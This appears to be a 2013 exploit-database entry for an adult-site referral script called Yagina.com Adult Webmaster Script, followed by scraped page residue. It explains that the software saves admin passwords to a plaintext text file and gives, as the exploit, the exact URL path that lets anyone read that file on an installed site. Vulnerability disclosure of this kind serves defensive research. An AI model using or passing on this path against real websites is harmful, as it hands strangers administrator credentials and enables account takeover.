# Exploit Title: Yagina.com Adult Webmaster Script Admin Password Disclosure # Category:webapps # Description software : software website for webmasters promoting adult companies through referrals # Date: 21-1-2013 # Exploit Author: Dshellnoi Unix # Vendor Homepage: http://www.yagina.com/ # Software Link: http://sourceforge.net/projects/adultweb/?source=dlp #-----------------------------VULNERABIlITY DESCRIPTION------------------------------------# The failure comes from saving passwords in a text file with php fwrite function, that can be read by the url #---------------------------------EXPLOIT---------------------------------------------------# #exploit http://[url]/admin/userpwdadfasdfre.txt #-------------------------------------------------------------------------------------------# #Thanks to : Luisfer ,Ivan sanchez, Juan carlos garciaБрой прочитания на тази страница: 1143
Adult Webmaster Script Password Disclosure Vulnerability